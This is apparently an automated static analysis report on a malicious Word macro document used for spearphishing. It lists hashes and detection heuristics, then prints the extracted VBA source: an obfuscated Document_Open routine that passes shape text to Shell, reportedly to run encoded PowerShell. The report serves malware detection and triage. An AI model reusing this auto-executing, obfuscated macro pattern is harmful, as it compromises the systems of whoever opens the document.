Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e006df6ae69da59d…

MALICIOUS

Office (OLE)

85.9 KB Created: 2018-11-05 10:02:00 Authoring application: Microsoft Office Word First seen: 2019-01-31
MD5: 134cd4edfa74a0468274a3d1e2720187 SHA-1: f01b4c952f46a9566bc14f9a761ee130c00ef5e3 SHA-256: e006df6ae69da59de6b699c4f0fb95ac4f0477252611855beefbf351fe3d19b1
152 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment

This document contains a Document_Open VBA macro that executes obfuscated PowerShell code. The PowerShell script decodes and executes a second-stage payload, likely for further system compromise. The presence of the Document_Open macro and the PowerShell execution strongly suggests a malicious intent, likely delivered via spearphishing.

Heuristics 7

  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 87,936 bytes but its declared streams total only 47,756 bytes — 40,180 bytes (46%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_open()
   Dim wDTiIL(2)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6645 bytes
SHA-256: d55f87f7a2e1e206f59f3a566a3b69689d637030e5b7460ddd3e6001bc9955b1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
268 of 351 identifiers look randomly generated (e.g. 'vSicFOIiWaDcRBMlVMNwjaam') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ipWpkHFqHjOpPt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   Dim wDTiIL(2)
wDTiIL(0) = InStrRev(jljNwd + ijsBIVMkvJqdUDjjwZjL + oNfFL, OCQWzjq + vuNCOpMvJQtqJzXqHhSYFc + EUiXpHF) / InStrRev(wApzBjHB + YsQwJiWJcVHZmbPmam + KZpHVGz, fqDjnV + SnvATqaDtIrPzAnZTbBO + wcjjdU) - InStrRev(zHwofqiO + MoTGjqPhwFNRZUOrTHZD + rBzhPq, RBYzsw + GnIkkqFvWTWkkSoooPqR + qAYLl) - InStrRev(wzBluQ + ctltXmpOniDHQVDkt + tKtBX, BpCGmMV + iSEKKYZKuvkjoLbAbAV + OMzcw)
wDTiIL(1) = InStrRev(iLzURofr + TrcopwVRblVdIDvzad + DNZRWOAf, XjdhMZZ + itGMiHJlktvDZbQUbHR + rGrka) * InStrRev(YbXzvz + rPFPuqizaHlIFXzNUbiWj + VTCrHc, cLCBBK + CKSEOEXmwrhtWUjV + wSfMicMz) * InStrRev(uLTfMQqA + fFJksKSjhUotrnrfq + aCwVvij, jTAPsJu + KtRibGFbUcwUFiHnWO + aDnUtwL) * InStrRev(YHjwIwaq + CLdfMHcKBGwJVHnlZGQlj + fZwij, YmZwYb + ozhmbwqRVnElatEzbD + UJdkjhu)
   Dim BpjJZc(3)
BpjJZc(0) = InStr(iiDjT + jokusEHkLhPTHhisEEtz + piIDaD, Mfpsfmm + AzsMaAAMdbmsmXCZwhI + lGcsl) + InStrRev(GKztzY + jHCNZuUszYHjMvpjbTSIOB + cstquN, qiuiRtlk + DhtOcBsivQwMZPcz + uvWEszH) / InStrRev(iiQBwfa + rjCisZqiVrdJlklXKjD + zNiinNh, MHbbP + MCPlXEYwRqtDCjoffqJDU + awiIIsia) - InStrRev(nRGuolD + nvAjSwkYGCzfdcSXIzL + zALSk, GhzBw + LKGHJThsVbQLSjbTvhSm + hBwRz)
BpjJZc(1) = InStr(DMHMCpC + RHqrTmaUXZdiXWHcSzPv + NzKTKjZK, KwshCP + aWFYiOpjaqICMRzbHKnATr + bdZZDdS) - InStrRev(mpVwi + zTiNwtcXnOnmjLjODJA + krOMPKf, mBzMEkw + BPPiijzIPParwdGQjM + lGAVn)
BpjJZc(2) = InStrRev(wRSMz + FIhNGANGuCSMfEkoHdY + MoCTz, zJkYzjT + sYzFSIfSmObmjaVAS + PzODJbCf) - InStrRev(fcPEZct + WALsEousXOSnNvJOLjdmqdw + hGwbJ, wDHJPOd + hSrPTalffzsNUGtQlY + BlzFs)
   Dim TlwlFf(3)
TlwlFf(0) = InStrRev(wHFYl + GiGiUMwLCmhWAPmZib + XtvdOF, rjKUFZ + YXNljTzSCzplMoFipY + SNnuBLf) - InStrRev(utAKOhp + ddMHHdiijzrfUvXwZwGUM + sLnmGQit, VKGJP + zpsPYUSKsfIztMlS + ZjMlYk) * InStrRev(RnJdFUW + TASTvXzYwWRtYzYGjdzaAh + WVRoc, SRbEdLN + nwTXPEbuQpZSmCSd + ItsMF) / InStr(YwvSmznB + qKQptMizsJSbtsiEaLJ + DwUWQ, QYhbTHR + JhGmnGViTGIwhdImv + OfFstt)
TlwlFf(1) = InStr(LbPXRd + VwdRnzMdlWupzfwTahuNbl + ftZVh, npRaaRT + HXWaLwiUKbMajCojjuQp + MpCOW) - InStrRev(EVFDO + jwqBXCWMPtFcmrhGUzGs + IUIEiwRd, kDOSNjzj + RZULrNIXwcGWiOIbRb + oHacPtk)
TlwlFf(2) = InStrRev(Fwhjzw + bJFvViMDfVqHVofDRlGOn + AYVfi, LpRVoTdt + OPJPkruTsvvSwQdJ + wCvvfb) + InStrRev(MaXUvAYm + SdkPazUWDpDzkRMOUEdY + RYKZu, bNqMo + vPKEQJJnuIiLYUFpHIbVvc + bmtNwkj) + InStrRev(uYIlw + QQLinGBHwZUTcHfhpt + wcFPR, EJSrFiRZ + ksGzLPLfwAFQBrNGirk + uPBco) - InStrRev(ipNEA + mMGEmwzsRzVSHdzH + wNWWu, PDwqJu + cmwSNvWkTLHPijFGqzjirh + pVJLdcZ)
   Dim iizZl(1)
iizZl(0) = InStr(wiNuEGJ + scVWHSzPuXqsqVENTKJw + lYpSjjrP, UbRALkz + zlGorcqCzHjjVZVuiLjamEB + DBjKzFAL) + InStrRev(wqqjvQw + FsiQfSbfKTkqltPwkbUOqK + silKnBNk, kEsXZh + zIFwiACSMlGZbjBhAf + ApZJLEM)
   Dim ISSEz(1)
ISSEz(0) = InStrRev(VjfNtt + AzDTclNaMcwNbIbfVQSV + lGTiS, nviiqj + vsAsUAAtIvSNUYhNrfts + MLRtaji) - InStr(ZYRdbEkM + XJCSXAEVrIBAAHiAAbMZVv + AjJGSB, bKsusWz + kYYQVOCMrwKXXkDCMl + iYfzw)
Const ZcHskhKhCZw = 68556202 - 68556202
Shell@ Shapes(1).TextFrame.TextRange.Text + iKwmvv + liBza, ZcHskhKhCZw
   Dim mMHYj(1)
mMHYj(0) = InStr(AITHuVbL + mfqXAsiKlwLEjEpPP + wqinVm, WKOkikI + EOtZqsiICKQlwYiApNmF + OmDrdUb) + InStrRev(LARuG + GNkNMlOqQCIMYRIcGipiijN + XjXcCpG, tVcYNH + SrftriirVRizDdSzsa + RsmtWz)
   Dim fRoXzA(2)
fRoXzA(0) = InStr(fEGIrp + JwQKvpoGzquAPofjn + nNwtTho, TnbrAKai + ARCJlQDrUMJKLCLCHHz + WGZjA) - InStrRev(wbLXNl + dPizSKdsMpHOUBwzmfqT + GPhzLSa, ZsdCAYMd + KzzQfqOnQhmvMRcdj + IPHEqw) / InStrRev(aCJwsp + CIpDmiSmCsnHjzAckJazXQPq + wiUFRaU, cawUHoGK + CITzBWqbRmXrnUXhpJiJl + noTLQG) / InStrRev(cTfkS + wMZEFiJJTicczhfmjB + AjZrKqSj, NKSkhMfd + ridVSUzFfzOYXjrzTq + dOWEOAS)
fRoXzA(1) = InStrRev(XwFSC + FWViYwUEMKjoiIEAGvA + mYuDrJFU, uzVFEf + ACpmSNfwOCwcXrzEjc + pDWkM) - InStrRev(zUftA + AGSqMqRfppNEasaGvA + rAhuPhRj, QrtmtQ + XYjufAuunTuGHRpiSbjNG + hVLowJ)
   Dim hRQQV(3)
hRQQV(0) = InStr(jETwKUpq + WZuvHUMUNBEkhijRlNd + mvZcvCc, izZnWa + DBopbUTAQFYiAIIMvQR + zlFhFWh) * InStrRev(NKcLzK + IumWcldAfNNCjDppOEO + wEUqQNL, IHWfPXA + EqUvSGYIHVMhuPDQnqmUP + APDnSomi) - InStrRev(OAmORXFD + aNGbpzokSWFTYoUpja + bpYlCWS, mDTnIb + FwurRIOIIjkOwcimRNj + kFTQFS) + InStrRev(XVacJ + jrXuOwCpFwLdFYjcGLp + qHWNs, NiUGZp + inDdLGXXqQjmwqaOEG + KTjjcIj)
hRQQV(1) = InStrRev(lcuSIM + jjwWcZjvWPwzVEsJcZ + ojAQTm, iVOUWOMi + CjmTHDfZNPCdbKnbCGu + ldNNaGs) + InStrRev(TXzcU + NoNGZsmPBEZGIFEii + ESVFtJEH, LQpRjVHJ + wYCTEKQsXlzkXkUiiiHIN + JlbjwZtB) - InStrRev(QCAjtpP + OjRhlnbCrqQoBinIaM + jDihTzo, nIwJrEpw + qJAPbwmiBGusKzHCUcOww + GEJawJR) / InStrRev(ZfnClj + slsPoMahvpVCnuph + DwdiwXGp, nLpFMk + sCzQOclOcAIvzspPlrozld + KmFqC)
hRQQV(2) = InStr(pVpmiA + JiowWSFQXUfaDnkaiwI + iXJWtCGO, iVwjHNr + TizwlSbwZDNAsqSzLOQFjuYh + cNqQU) * InStrRev(jaXDSD + vSicFOIiWaDcRBMlVMNwjaam + ttKIQ, uEMsUiv + OnOYLSILciWzBicCcQuLjZ + zzBhSBm) + InStr(XzvalwWo + wChQktSdUbtmKMkuPU + rEkfbrSX, TVdQiRi + JrLoAColmtnllMAXRaK + GfYIu) * InStrRev(QqkBwf + cmQjldpjQZXQGHvHiUijjH + wBkOLvQ, KdKbQwo + GCKjbCXhPzGTztjwC + ALcwUkj)
   Dim cJOzVj(4)
cJOzVj(0) = InStrRev(niPJGI + LElOnoKIMTUiFoafHwdT + HwjqcM, dcuYKsoz + JNkmhpGndSlhknAbkfzvYEd + LiqIIoK) / InStrRev(UOtkpju + uJkJLwXEJRLhEcwnJdt + WLdiA, BvMilA + ulDiATnJzPMiOBjimz + EUpQQUWK) - InStr(bsYZPZj + TlkdluzhBROWbJKCBSnnu + OuplK, bzDTrEW + oICLERZGOjDFfqffhIwrS + bsjSGjNv) - InStrRev(raBwSPf + iWTFcAqGPsRkpjtnH + JjSzQdiP, vzCYHn + hqHjGMvsHjVToMnmdkw + WbWlbkhw)
cJOzVj(1) = InStrRev(aIhdZF + kbfWZHOMUAahlKiqVUH + jVNLGiNj, LjKzCP + YNwPopRTvPXAsqDtT + GTpSaDG) / InStrRev(bOGiMrQ + lpPSRNhiSIzWuGdaV + LIToIu, BaWUiROo + DsYoCcFzoGOpLJGzdFUmp + cBEpjSb) * InStr(WwXFqj + GinkLKTmpYVjGVADYKI + qsnQHBI, ZjHcwR + CYcDdjPzkqfIkAuSXCiGj + JZauYjNn) * InStrRev(LjMJXBI + ORpiObwTiXRhZqoEM + UcOhRh, BWqOQfTr + VktFjSKfkhMEvwNTj + pThBbh)
cJOzVj(2) = InStrRev(Fwclq + PswSGCSoSmEUXfIBu + iqhBdi, SNnWhUX + SRBsjdoTzazcprKFlFZuj + ZRzBlzRF) + InStrRev(ZfzBENJ + mpXKYKScwtWSnMqSNaf + wYMKE, PPaRJBGY + hpHpGHrlrWqRhQMAdzO + dHrWZ)
cJOzVj(3) = InStr(RHmtp + rRUvTpZzsKrlhbTuAM + VqWlEi, RCwUiIEv + DKwLidMZKZvPFtBwEQqS + omZpYWYo) + InStrRev(oRJHt + JUOVmbhJzwBVNStqmDBnB + zEkpzDfE, pXBtwIPX + uvwWrNCIIjNOnvTCuWRfuF + zovlQbVF) * InStr(NwjBs + QbJOzbwUfPcQvVEz + PmthtP, StdVGd + dANkpwwcmFwDvjCBpQhE + bBmmHJY) - InStrRev(sEkch + nEGJmRFwmDcoWvvNuKTV + KuVsKGV, cdzCoKwp + FvzmwISUZfUjcWjDYfiv + SwwVCzUP)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.